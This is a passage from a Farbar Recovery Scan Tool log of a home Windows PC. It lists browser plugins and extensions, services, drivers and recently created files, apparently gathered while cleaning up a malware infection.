CHR Plugin: (CouponNetwork Coupon Activator Netscape Plugin v. 5.0.0.0) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPcol500.dll (Catalina Marketing Corporation)
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npCouponPrinter.dll => No File
CHR Plugin: (Coupons Inc., Coupon Printer Manager ) - C:\Program Files (x86)\Mozilla Firefox\plugins\npMozCouponPrinter.dll => No File
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.7) - C:\Program Files (x86)\Mozilla Firefox\plugins\npqtplugin7.dll (Apple Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin1017300.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll => No File
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll => No File
CHR Plugin: (Foxit Reader Plugin for Mozilla) - C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll => No File
CHR Plugin: (Java Platform SE 7 U7) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
CHR Plugin: (McAfee Security Scanner +) - C:\Program Files (x86)\McAfee Security Scan\3.0.318\npMcAfeeMss.dll => No File
CHR Plugin: (My Web Search Plugin Stub) - C:\Program Files (x86)\MyWebSearch\bar\1.bin\NPMyWebS.dll => No File
CHR Plugin: (Windows Live® Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\windows\SysWOW64\Macromed\Flash\NPSWF32_11_6_602_180.dll => No File
CHR Plugin: (Java Deployment Toolkit 7.0.70.11) - C:\windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll => No File
CHR Profile: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (The Best Price (extension)) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\gehjddhojclknjlgakpfmhlhkbpeakjf [2013-07-04]
CHR Extension: (Any.do Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdadialhpiikehpdeejjeiikopddkjem [2016-03-08]
CHR Extension: (Evernote Web) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol [2014-03-18]
CHR Extension: (Google Maps) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2015-09-28]
CHR Extension: (Springpad Extension) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\njhgeimnepehieioinbhmfpphfoocmng [2013-07-04]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-01]
CHR Extension: (My Chrome Theme) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2015-08-27]
CHR Extension: (Evernote Web Clipper) - C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\pioclpoplcdbaefihamjohnefbikjilc [2016-03-08]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 ADVService; C:\Program Files (x86)\Amazon\Amazon Unbox Video\ADVWindowsClientService.exe [25704 2011-11-24] (Amazon.com) [File not signed]
R2 LeapFrog Connect Device Service; C:\Program Files (x86)\LeapFrog\LeapFrog Connect\CommandService.exe [7241728 2014-07-11] (LeapFrog Enterprises, Inc.) [File not signed]
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 PCCUJobMgr; C:\Program Files (x86)\Norton PC Checkup\Engine\2.0.3.198\ccSvcHst.exe [126392 2009-08-24] (Symantec Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [315648 2015-09-28] (Realtek Semiconductor)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-06-12] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 hitmanpro37; C:\windows\system32\drivers\hitmanpro37.sys [43664 2015-01-28] ()
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-12] (Synaptics Incorporated)
S0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2012-07-05] (Duplex Secure Ltd.)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [45728 2015-08-27] (Toshiba Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 14:42 - 2016-03-09 14:42 - 00016148 _____ C:\WINDOWS\system32\DURABLE_Lexi_HistoryPrediction.bin
2016-03-09 10:30 - 2016-03-09 14:43 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 10:30 - 2016-03-09 10:30 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 10:30 - 2016-03-09 10:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 10:29 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 10:29 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 10:29 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 10:23 - 2016-03-09 10:24 - 22908888 _____ (Malwarebytes ) C:\Users\Lexi\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 10:01 - 2016-03-09 10:12 - 00043720 _____ C:\Users\Lexi\Downloads\Fixlog.txt
2016-03-08 22:47 - 2016-03-08 22:48 - 02374144 _____ (Farbar) C:\Users\Lexi\Downloads\FRST64.exe
2016-03-08 21:23 - 2016-02-23 07:16 - 02237952 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-08 21:23 - 2016-02-23 06:55 - 24592896 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-08 21:23 - 2016-02-23 06:45 - 12504576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-08 21:23 - 2016-02-23 05:55 - 19326464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-08 21:23 - 2016-02-23 05:48 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-08 21:23 - 2016-02-23 05:38 - 07524864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-08 21:23 - 2016-02-23 05:00 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-08 21:23 - 2016-02-23 05:00 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-08 21:23 - 2016-02-23 04:58 - 18800640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-08 21:22 - 2016-02-23 09:53 - 01314496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-08 21:22 - 2016-02-23 09:52 - 00858408 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-08 21:22 - 2016-02-23 09:51 - 00633184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-03-08 21:22 - 2016-02-23 09:51 - 00146784 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-08 21:22 - 2016-02-23 09:50 - 00630160 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-08 21:22 - 2016-02-23 09:48 - 08022368 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-08 21:22 - 2016-02-23 09:48 - 01294352 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-08 21:22 - 2016-02-23 09:48 - 01123952 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-08 21:22 - 2016-02-23 09:41 - 01150816 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-08 21:22 - 2016-02-23 09:41 - 00299600 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL
2016-03-08 21:22 - 2016-02-23 09:41 - 00078040 _____ (Microsoft Corporation) C:\WINDOWS\system32\wkscli.dll
2016-03-08 21:22 - 2016-02-23 09:40 - 00110584 _____ (Microsoft Corporation) C:\WINDOWS\system32\srvcli.dll
2016-03-08 21:22 - 2016-02-23 09:38 - 00272752 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-08 21:22 - 2016-02-23 09:36 - 00080128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netapi32.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00781984 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00658784 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-08 21:22 - 2016-02-23 09:11 - 00103776 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-03-08 21:22 - 2016-02-23 09:08 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-08 21:22 - 2016-02-23 09:07 - 22322624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-08 21:22 - 2016-02-23 08:39 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-08 21:22 - 2016-02-23 08:30 - 01643872 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-08 21:22 - 2016-02-23 08:25 - 01085632 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-08 21:22 - 2016-02-23 08:23 - 00952968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-08 21:22 - 2016-02-23 08:21 - 00529456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-08 21:22 - 2016-02-23 08:21 - 00141152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-08 21:22 - 2016-02-23 08:11 - 00249976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL
2016-03-08 21:22 - 2016-02-23 08:11 - 00073360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srvcli.dll
2016-03-08 21:22 - 2016-02-23 08:11 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wkscli.dll
2016-03-08 21:22 - 2016-02-23 08:09 - 00229352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-08 21:22 - 2016-02-23 08:06 - 00069232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netapi32.dll
2016-03-08 21:22 - 2016-02-23 07:58 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-03-08 21:22 - 2016-02-23 07:50 - 00395264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-08 21:22 - 2016-02-23 07:50 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetCfgNotifyObjectHost.exe
2016-03-08 21:22 - 2016-02-23 07:42 - 00658536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-08 21:22 - 2016-02-23 07:42 - 00467296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-08 21:22 - 2016-02-23 07:42 - 00078176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-03-08 21:22 - 2016-02-23 07:39 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-08 21:22 - 2016-02-23 07:38 - 20858360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-08 21:22 - 2016-02-23 07:35 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-08 21:22 - 2016-02-23 07:20 - 00138240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys
2016-03-08 21:22 - 2016-02-23 07:17 - 00333312 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-03-08 21:22 - 2016-02-23 07:15 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-08 21:22 - 2016-02-23 07:15 - 00033280 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
2016-03-08 21:22 - 2016-02-23 06:59 - 00319488 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkBindingEngineMigPlugin.dll
2016-03-08 21:22 - 2016-02-23 06:59 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-08 21:22 - 2016-02-23 06:57 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-08 21:22 - 2016-02-23 06:45 - 06788608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-08 21:22 - 2016-02-23 06:42 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-08 21:22 - 2016-02-23 06:42 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-08 21:22 - 2016-02-23 06:38 - 02663424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-08 21:22 - 2016-02-23 06:37 - 00057344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetCfgNotifyObjectHost.exe
2016-03-08 21:22 - 2016-02-23 06:36 - 00281600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-08 21:22 - 2016-02-23 06:25 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-08 21:22 - 2016-02-23 06:18 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-08 21:22 - 2016-02-23 06:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\system32\browser.dll
2016-03-08 21:22 - 2016-02-23 06:17 - 00058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\browcli.dll
2016-03-08 21:22 - 2016-02-23 06:14 - 00841728 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-03-08 21:22 - 2016-02-23 06:08 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-08 21:22 - 2016-02-23 06:04 - 00225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-08 21:22 - 2016-02-23 06:03 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-08 21:22 - 2016-02-23 06:03 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-08 21:22 - 2016-02-23 06:02 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-08 21:22 - 2016-02-23 05:55 - 14241792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-08 21:22 - 2016-02-23 05:51 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-08 21:22 - 2016-02-23 05:51 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-08 21:22 - 2016-02-23 05:48 - 05157376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-08 21:22 - 2016-02-23 05:46 - 00400384 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 01844736 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-08 21:22 - 2016-02-23 05:45 - 00574464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-08 21:22 - 2016-02-23 05:45 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-08 21:22 - 2016-02-23 05:44 - 01821696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-08 21:22 - 2016-02-23 05:29 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\browcli.dll
2016-03-08 21:22 - 2016-02-23 05:17 - 00393728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-08 21:22 - 2016-02-23 05:17 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-08 21:22 - 2016-02-23 05:11 - 12589056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-08 21:22 - 2016-02-23 05:03 - 01495040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-08 12:39 - 2016-03-08 12:39 - 00058675 _____ C:\Users\Lexi\Desktop\FRST.txt
2016-03-08 12:39 - 2016-03-08 12:39 - 00050962 _____ C:\Users\Lexi\Desktop\Addition.txt
2016-03-08 12:25 - 2016-03-08 23:00 - 00058257 _____ C:\Users\Lexi\Downloads\Addition.txt
2016-03-08 12:22 - 2016-03-09 14:51 - 00031582 _____ C:\Users\Lexi\Downloads\FRST.txt
2016-03-08 12:22 - 2016-03-09 14:51 - 00000000 ____D C:\FRST
2016-03-08 09:47 - 2016-03-08 22:03 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-08 09:28 - 2016-03-08 09:28 - 00001049 _____ C:\Users\Lexi\Documents\malwaresecondtime.txt
2016-03-08 09:27 - 2016-03-08 09:27 - 00081882 _____ C:\Users\Lexi\Documents\malwarfirsttime.txt
2016-03-07 23:01 - 2016-03-08 09:36 - 00000000 ____D C:\Users\Lexi\AppData\Local\Deployment
2016-03-06 21:09 - 2016-03-06 21:09 - 00058906 _____ C:\Users\Lexi\Desktop\sfcdetails.txt
2016-03-04 09:58 - 2016-03-09 10:30 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-03-04 09:58 - 2016-03-04 09:58 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-03 23:59 - 2016-03-07 13:16 - 00000000 ____D C:\AdwCleaner
2016-03-02 17:45 - 2016-03-02 17:45 - 00002675 _____ C:\Users\Lexi\Downloads\Your Great Value Vacations The notice on that all  documents are ready 20160003149979 _.html
2016-03-01 19:50 - 2016-03-01 19:50 - 00024404 _____ C:\Users\Lexi\Downloads\Aerobic Cellular Respiration Summary Table.pdf
2016-03-01 19:31 - 2016-03-01 19:31 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide (1).pdf
2016-03-01 19:30 - 2016-03-01 19:30 - 00008986 _____ C:\Users\Lexi\Downloads\Cellular Respiration and Fermentation Study Guide.pdf
2016-02-29 16:32 - 2016-02-29 16:32 - 00346580 _____ C:\Users\Lexi\Downloads\securedoc_20160219T091446.html
2016-02-29 16:10 - 2016-02-29 16:10 - 00137376 _____ C:\Users\Lexi\Downloads\March homework 2016.pdf
2016-02-25 20:18 - 2016-02-25 20:18 - 00537031 _____ C:\Users\Lexi\Downloads\msert.exe
2016-02-25 13:02 - 2016-02-25 21:16 - 08583186 _____ C:\Users\Lexi\Documents\AVG BIO101 template6.pptx
2016-02-24 23:06 - 2016-02-24 23:06 - 01112064 _____ C:\Users\Lexi\Downloads\05_Clicker_Questions.ppt
2016-02-24 23:05 - 2016-02-24 23:06 - 00773109 _____ C:\Users\Lexi\Downloads\06_Animations.zip
2016-02-24 23:05 - 2016-02-24 23:06 - 00747369 _____ C:\Users\Lexi\Downloads\06_Videos.zip
2016-02-24 23:05 - 2016-02-24 23:05 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions (1).ppt
2016-02-24 23:04 - 2016-02-24 23:04 - 01201152 _____ C:\Users\Lexi\Downloads\06_Clicker_Questions.ppt
2016-02-24 18:01 - 2016-02-24 18:01 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2016-02-21 17:28 - 2016-02-21 17:29 - 41085818 _____ C:\Users\Lexi\Downloads\05_Videos.zip
2016-02-21 17:28 - 2016-02-21 17:29 - 127679537 _____ C:\Users\Lexi\Downloads\05_BioFlix_Animations.zip
2016-02-21 17:28 - 2016-02-21 17:28 - 02486374 _____ C:\Users\Lexi\Downloads\05_Animations.zip
2016-02-20 19:59 - 2016-02-20 19:59 - 00262144 _____ C:\WINDOWS\Minidump\022016-45890-01.dmp
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report.csv
2016-02-20 00:06 - 2016-02-20 00:06 - 00014174 _____ C:\Users\Lexi\Downloads\Quiz 2  How Do Cells Function- Quiz Student Analysis Report (1).csv
2016-02-17 18:02 - 2016-03-08 22:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Evernote
2016-02-17 18:02 - 2016-02-17 18:02 - 00002523 _____ C:\Users\Public\Desktop\Evernote.lnk
2016-02-11 22:52 - 2016-02-11 22:52 - 00028661 _____ C:\Users\Lexi\Downloads\A Tour of the Cell Study Guide (1).pdf
2016-02-10 12:09 - 2016-02-10 12:09 - 08817344 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2016-02-10 09:09 - 2016-01-31 01:25 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:25 - 01248896 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:24 - 01824880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 02601160 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-10 09:09 - 2016-01-31 01:23 - 01420392 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01535032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 01531368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-02-10 09:09 - 2016-01-31 01:06 - 00809336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01811360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-10 09:09 - 2016-01-31 01:04 - 01180696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-02-10 09:09 - 2016-01-31 00:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-02-10 09:09 - 2016-01-31 00:33 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 11557888 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:29 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasman.dll
2016-02-10 09:09 - 2016-01-31 00:26 - 03793408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00366592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-02-10 09:09 - 2016-01-31 00:25 - 00143872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2016-02-10 09:09 - 2016-01-31 00:24 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2016-02-10 09:09 - 2016-01-31 00:24 - 00047616 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-02-10 09:09 - 2016-01-31 00:23 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2016-02-10 09:09 - 2016-01-31 00:22 - 00680448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-02-10 09:09 - 2016-01-31 00:20 - 02849792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 01602560 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-02-10 09:09 - 2016-01-31 00:19 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IoTAssignedAccessLockFramework.dll
2016-02-10 09:09 - 2016-01-31 00:18 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-10 09:09 - 2016-01-31 00:17 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 09889280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-02-10 09:09 - 2016-01-31 00:16 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-02-10 09:09 - 2016-01-31 00:13 - 04791808 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
